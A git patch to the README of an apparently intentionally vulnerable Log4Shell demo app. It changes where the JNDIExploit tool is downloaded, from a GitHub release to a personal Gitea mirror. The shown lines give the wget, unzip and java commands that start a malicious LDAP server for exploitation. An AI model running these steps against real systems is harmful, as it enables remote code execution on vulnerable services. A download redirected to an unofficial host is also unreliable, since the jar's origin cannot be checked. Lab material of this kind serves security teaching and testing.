From 2ceb2921ea79c5fce5cbc93f4a173a1ad157c36e Mon Sep 17 00:00:00 2001 From: borekon Date: Mon, 12 Jun 2023 15:18:32 +0000 Subject: [PATCH] Actualizar 'README.md' --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index fda0f0b..3eaccaf 100644 --- a/README.md +++ b/README.md @@ -24,7 +24,7 @@ docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shel * Use [JNDIExploit](https://github.com/zzwlpx/JNDIExploit) to spin up a malicious LDAP server ```bash -wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip +wget https://gitea.avc.cx/borekon/log4shell-vulnerable-app/raw/branch/main/JNDIExploit.v1.2.zip unzip JNDIExploit.v1.2.zip java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888 ```